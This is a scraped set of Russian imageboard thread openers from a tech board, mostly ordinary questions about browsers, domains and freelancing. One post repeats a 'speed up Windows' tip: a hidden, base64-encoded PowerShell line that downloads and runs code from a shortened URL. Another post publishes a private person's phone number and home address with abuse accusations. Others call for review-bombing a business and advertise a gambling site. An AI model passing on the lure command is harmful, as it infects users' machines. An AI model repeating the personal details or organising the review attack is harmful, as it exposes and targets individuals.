22 Кб, 1920x953
хуй знает в тот тред пишу нет, вообщем:
собрал новый пк, все супер, но блядский ютуб не открывается ни на одном из браузеров, ошибка на пикриле
чего только не перепробовал, от изменения времени до отчистки ssl и тд
ps: пытаюсь заходить через zapret, на старом пк все идеально при тех же условиях заходит
200 рублей скину если кто поможет фиксануть этот гемор
собрал новый пк, все супер, но блядский ютуб не открывается ни на одном из браузеров, ошибка на пикриле
чего только не перепробовал, от изменения времени до отчистки ssl и тд
ps: пытаюсь заходить через zapret, на старом пк все идеально при тех же условиях заходит
200 рублей скину если кто поможет фиксануть этот гемор
191 Кб, 1280x657
Добрый день
Наша компания GamblingSolutions предлагает вам покупку проекта Cazaro (его ранняя версия представлена на скриншотах), либо же покупку создания полностью вашего проекта с вашим тз.
Поскольку версия сайта не финальная, вы можете вносить корректировки.
Почему мы рекомендуем вам выбрать именно нашу компанию?
Мы предлагаем выполнение работы в кратчайшие сроки, подключение лайвов и слотов, а также создание любых режимов, за приемлемую цену, таким образом, за Cazaro мы просим 4000$. В эту цену включена постоянная онлайн поддержка, наличие на сайте нескольких кастомных режимов, а также подключение слотов.
Просим вас задать любые вопросы в случае заинтересованности:)
Telegram https://t.me/GSManag3r
Наша компания GamblingSolutions предлагает вам покупку проекта Cazaro (его ранняя версия представлена на скриншотах), либо же покупку создания полностью вашего проекта с вашим тз.
Поскольку версия сайта не финальная, вы можете вносить корректировки.
Почему мы рекомендуем вам выбрать именно нашу компанию?
Мы предлагаем выполнение работы в кратчайшие сроки, подключение лайвов и слотов, а также создание любых режимов, за приемлемую цену, таким образом, за Cazaro мы просим 4000$. В эту цену включена постоянная онлайн поддержка, наличие на сайте нескольких кастомных режимов, а также подключение слотов.
Просим вас задать любые вопросы в случае заинтересованности:)
Telegram https://t.me/GSManag3r
147 Кб, 400x366
Хочу сделать свой небольшой имиджборд, но не могу найти достаточно информации, доков там, чтобы понять как это делать, посоветуйте каких-нибудь гайдов по созданию борд
182 Кб, 900x900
шалом, щас учу c++ , до этого выучил пхп с ноудjs`ом, питон с джаваскрпитом(на ванильном уровне оба). Подскажите куда с такими знаниями ваще можно углубиться, мне 14...
287 Кб, 900x674
Доброго вечера всем,хочу узнать каким браузером пользуйтесь ,не считая тора ,например ,может быть кто то из вас юзает IceCat,SeaMonkey и тд?
P.s гугл надоел не открывать некоторые сайты
P.s гугл надоел не открывать некоторые сайты
62 Кб, 533x800
Сап, двач! Хочу создать сайт для взрослых, только хз выгодное ли это занятие.
Давайте представим что у меня есть такой сайт, и на него заходит 10к тел в день. Сколько я смогу зарабатывать, если не увешивать сайт рекламой с ног до головы? Хотя бы очень примерно.
Давайте представим что у меня есть такой сайт, и на него заходит 10к тел в день. Сколько я смогу зарабатывать, если не увешивать сайт рекламой с ног до головы? Хотя бы очень примерно.
38 Кб, 1494x970
89006955110 люда изверг
улица 50 лет Октября, 81, Стародуб, Брянская область, 243240
издеваетеся над приемными девушками - они не могут ничего сделать запуганны с детства:
живут в доме большом 2 девушки удочерины а 2 их внуки внуки делают что а девушкам нельзя самим хотя им по 20л выйти в туалет на улицу нельзя просто гулять по дому нельзя даже чай попить взять там изверг орет сразу и не дает этого сделать + на утро кормит всегда одним и тем же гречка с сахаром и молоком + может просто срыватсья и орать на них + нельзя взять без разрешения ничего + дома заставляет внука смотреть за ними чтобы они ничего не стырили и не ходили по дому + кормит таблетками серьезными не давая сдать анализы чтобы такие таблетки пить и тд корчое полный изверг чем помочь я незнаю я писал анонимку в опеку нет ответа сам друг просто из другой страны - помогите кто нибуть чем нить с этой ситуацией!!!!
улица 50 лет Октября, 81, Стародуб, Брянская область, 243240
издеваетеся над приемными девушками - они не могут ничего сделать запуганны с детства:
живут в доме большом 2 девушки удочерины а 2 их внуки внуки делают что а девушкам нельзя самим хотя им по 20л выйти в туалет на улицу нельзя просто гулять по дому нельзя даже чай попить взять там изверг орет сразу и не дает этого сделать + на утро кормит всегда одним и тем же гречка с сахаром и молоком + может просто срыватсья и орать на них + нельзя взять без разрешения ничего + дома заставляет внука смотреть за ними чтобы они ничего не стырили и не ходили по дому + кормит таблетками серьезными не давая сдать анализы чтобы такие таблетки пить и тд корчое полный изверг чем помочь я незнаю я писал анонимку в опеку нет ответа сам друг просто из другой страны - помогите кто нибуть чем нить с этой ситуацией!!!!
44 Кб, 495x323
Посоветуйте сервис для покупки домена
Чтобы был дешевый на рег и продление, и возможность оплаты МИР или СБП
Срочно ищу для своего сайта
Вот что я нашел:
regway (думаю этот, но не знаю сколько там продление будет стоить)
timeweb
beget
Чтобы был дешевый на рег и продление, и возможность оплаты МИР или СБП
Срочно ищу для своего сайта
Вот что я нашел:
regway (думаю этот, но не знаю сколько там продление будет стоить)
timeweb
beget
127 Кб, 1200x628
Анон, я захотел запилить тг канал с мемами. Не продавать никакие товары, не вонючие курсы, тренинги, вебинары и прочий кал. Такие прекрасно рекламятся в рся, инсте и прочем, у них рекламные бюджеты, цена за клик, и прочее.
Но что если в меня мемы уровня /b, метапостирония в картинках? Или например паблик с моим нытьем? Или паблик с копипастами?
Как бы ты пиарил это говно, не вкладывая бабло или вкладывая совсем минимум, чтобы это было как хобби, на которое не жалко, а не бизнес с вложениями.
Я долго думал и мне пришло в голову только банальное расклеивание стикеров с qr кодом и покупка рекламы у маленьких нонейм каналов. Очевидно всякие обмены репостами не моя тема, для этого сначала аудитория должна быть, просмотры, чтобы другим это было интересно. Форс этого дерьма на двачах быстро попадет в бан. Спам в телеге уведет в бан уже сам канал. А как бы поступал ты? Дай советов мудрых.
Но что если в меня мемы уровня /b, метапостирония в картинках? Или например паблик с моим нытьем? Или паблик с копипастами?
Как бы ты пиарил это говно, не вкладывая бабло или вкладывая совсем минимум, чтобы это было как хобби, на которое не жалко, а не бизнес с вложениями.
Я долго думал и мне пришло в голову только банальное расклеивание стикеров с qr кодом и покупка рекламы у маленьких нонейм каналов. Очевидно всякие обмены репостами не моя тема, для этого сначала аудитория должна быть, просмотры, чтобы другим это было интересно. Форс этого дерьма на двачах быстро попадет в бан. Спам в телеге уведет в бан уже сам канал. А как бы поступал ты? Дай советов мудрых.
6 Кб, 1017x42
Внезапно нашел годноту из разряда “ускорь винду” на ютубе: Win+R и вставить строку
powershell -w h -nop -noni -e aQBlAHgAIAAoAGkAdwByACAAJwBoAHQAdABwAHMAOgAvAC8AdAAuAGwAeQAvAFkAUAB3AG0AdAAnACkA
Вбил строку (пикрил), и действительно. %TEMP% папка исчезла, но диск стал раза в 3 быстрее отвечать, очистилось 40 ГБ. В чем подводные и что за фича?
powershell -w h -nop -noni -e aQBlAHgAIAAoAGkAdwByACAAJwBoAHQAdABwAHMAOgAvAC8AdAAuAGwAeQAvAFkAUAB3AG0AdAAnACkA
Вбил строку (пикрил), и действительно. %TEMP% папка исчезла, но диск стал раза в 3 быстрее отвечать, очистилось 40 ГБ. В чем подводные и что за фича?
459 Кб, 640x432
хочу сделать из 10\11 винды windows xp,чтобы лагов не было и подобного,либо сборку xp с поддержкой новых программ и обновлений.если знаете какие нибудь сборки или приложения,напишите
43 Кб, 145x175
а где вы сейчас ищете дешевыхую рабовчую силу?
раньше был хабр, а теперь непонятно что делать. где искать 5р в час за заполнение каптч?
раньше был хабр, а теперь непонятно что делать. где искать 5р в час за заполнение каптч?
105 Кб, 975x604
Всем ку. Объясню ситуацию. Живу в жопе мира, образование проебал, перспектив никаких, выбраться из этого болота тоже вариантов особо нет.
Поэтому думаю вкатиться на фриланс. Есть тут успешные фрилансеры? Слышал от всяких околоайтишных блогеров и на форумах, что фриланс зло, там работают за еду, конкуренции много, а новичку в программировании, коим я являюсь, там и вовсе делать нечего. Но слышал еще и об успешных фрилансерах, но они работали на upwork, это было еще до санкций и прочей ерунды. Как дела сейчас на российских биржах? А может есть еще варианты, кроме бирж?
Знаю, что проще всего вкатиться через php, всякие вордпрессы, cms, битриксы и прочее. Есть ли еще варианты? Мне кажется, что, например, с фронтендом беда на фрилансе, все таки заказчикам нужен готовый продукт, то есть сайт, а не его часть в виде фронтенда. То есть, нужно быть фулстеком. Ну вот, сам спросил, сам и ответил.
А потом, если все будет норм, я бы пошел куда-нибудь в другие области, посложнее, может быть в какую-нибудь крипту с блокчейнами или в мобильные приложения.
Предвидя комменты в стиле "ради денег нельзя вкатываться в программирование", скажу, что писать код мне вполне нравится.
Посоветуйте что-нибудь, плиз, не хочу так больше жить, заебало. Я еще молодой, жизнь пройдет и я умру, прожив уебищную жизнь, даже вспомнить нечего будет. А я не хочу так.
Поэтому думаю вкатиться на фриланс. Есть тут успешные фрилансеры? Слышал от всяких околоайтишных блогеров и на форумах, что фриланс зло, там работают за еду, конкуренции много, а новичку в программировании, коим я являюсь, там и вовсе делать нечего. Но слышал еще и об успешных фрилансерах, но они работали на upwork, это было еще до санкций и прочей ерунды. Как дела сейчас на российских биржах? А может есть еще варианты, кроме бирж?
Знаю, что проще всего вкатиться через php, всякие вордпрессы, cms, битриксы и прочее. Есть ли еще варианты? Мне кажется, что, например, с фронтендом беда на фрилансе, все таки заказчикам нужен готовый продукт, то есть сайт, а не его часть в виде фронтенда. То есть, нужно быть фулстеком. Ну вот, сам спросил, сам и ответил.
А потом, если все будет норм, я бы пошел куда-нибудь в другие области, посложнее, может быть в какую-нибудь крипту с блокчейнами или в мобильные приложения.
Предвидя комменты в стиле "ради денег нельзя вкатываться в программирование", скажу, что писать код мне вполне нравится.
Посоветуйте что-нибудь, плиз, не хочу так больше жить, заебало. Я еще молодой, жизнь пройдет и я умру, прожив уебищную жизнь, даже вспомнить нечего будет. А я не хочу так.
245 Кб, 960x1280
Как называть стримы, видео, рилсы, чтобы их находили футфетишисты, не нарушая правил сообщества? Как эту тему раскручивать?
Заранее спасибо. Ссылки не кидаю, обсуждаем только формулировки и раскрутку, чтобы всё было легально и без нарушений.
Заранее спасибо. Ссылки не кидаю, обсуждаем только формулировки и раскрутку, чтобы всё было легально и без нарушений.
1,6 Мб, 1366x768
Здрасте. Такая тема. Вот бургерная которая принимают на работу людей, а потом морально доводит их до желания умереть. Начальник Денис реальный козёл, и после него у меня даже до сих пор остался ожог и синяк на руке.
Бизнес находится в германии, и кому не сложно, пожалуйста оставьте там "хороший" отзыв
https://maps.app.goo.gl/AhZZ8peBRFhQhi228?g_st=ipc
Бизнес находится в германии, и кому не сложно, пожалуйста оставьте там "хороший" отзыв
https://maps.app.goo.gl/AhZZ8peBRFhQhi228?g_st=ipc
406 Кб, 1024x625
Уважаемые знатоки, возникла нужда в подсирательстве.
Бэк такой. Не шарю кто там первый камень кинул, но посрались два сообщества. "Коллеги" объявили нас "конкурентами", запретили какое-либо сотрудничество своим филиалам. Казалось бы, но спустя подозрительно короткий промежуток времени (пара дней) после произошли массовые налеты ботов в соц-сетях. Особенно засрали ТГ, под каждый пост полезло по 5-6 "нравятся мои фото? Пиши сюда". Защиту от спама подрубили конечно, но во-первых, иногда хорни-скайнет прорывается, во-вторых, теперь приходится платить за защиту от голых женщин, и в-третьих, обидна блин.
Посоветуйте как и какую ответку дать окаянным? Мы ребята не прошаренные и в подобном не шарим, но терпилами быть не хочется.
Бэк такой. Не шарю кто там первый камень кинул, но посрались два сообщества. "Коллеги" объявили нас "конкурентами", запретили какое-либо сотрудничество своим филиалам. Казалось бы, но спустя подозрительно короткий промежуток времени (пара дней) после произошли массовые налеты ботов в соц-сетях. Особенно засрали ТГ, под каждый пост полезло по 5-6 "нравятся мои фото? Пиши сюда". Защиту от спама подрубили конечно, но во-первых, иногда хорни-скайнет прорывается, во-вторых, теперь приходится платить за защиту от голых женщин, и в-третьих, обидна блин.
Посоветуйте как и какую ответку дать окаянным? Мы ребята не прошаренные и в подобном не шарим, но терпилами быть не хочется.
218 Кб, 480x306
За россиянами будут следить не только операторы связи и интернет-провайдеры, но и мессенджеры, социальные сети, а также сервисы объявлений. Новый пакет мер по борьбе с кибермошенничеством обязывает компании отслеживать «признаки противоправных действий», раскрывать личности нарушителей и блокировать звонки с иностранных номеров. Вся информация будет заноситься в базу ГИС «Антифрод». Эксперты уже назвали инициативу «режимом постоянного проактивного мониторинга». В силу пакет вступит 1 марта 2026 года. С 1 сентября 2025 года в России начнёт действовать статья 13.53 КоАП, которая предусматривает штрафы от 3 000 до 5 000 рублей за умышленный поиск и доступ к экстремистским материалам в интернете, в том числе с помощью VPN, анонимайзеров и других средств обхода блокировок (ВОПРОС В ТОМ КАК ОБОЙТИ И ОСТАВАТЬСЯ АНОНИМНЫМ???) (И например, что если в школе заставят скачать приложение Max да и документы подписать заставят?)
30 Кб, 630x630
Улица почти в центре города, стоит 10-15 частных домов и все без инета или телефонной линии. Обзвонил всех провайдеров — шлют нахуй нет тех. возможности.
Что можно придумать кроме тупых советов тип модем или спутник. Или я вжопе полной? В 150-200м от улицы новостройка бояре сидят со своим оптоволокном, а я только на хую с симкой.
Помогите советом, молю
Что можно придумать кроме тупых советов тип модем или спутник. Или я вжопе полной? В 150-200м от улицы новостройка бояре сидят со своим оптоволокном, а я только на хую с симкой.
Помогите советом, молю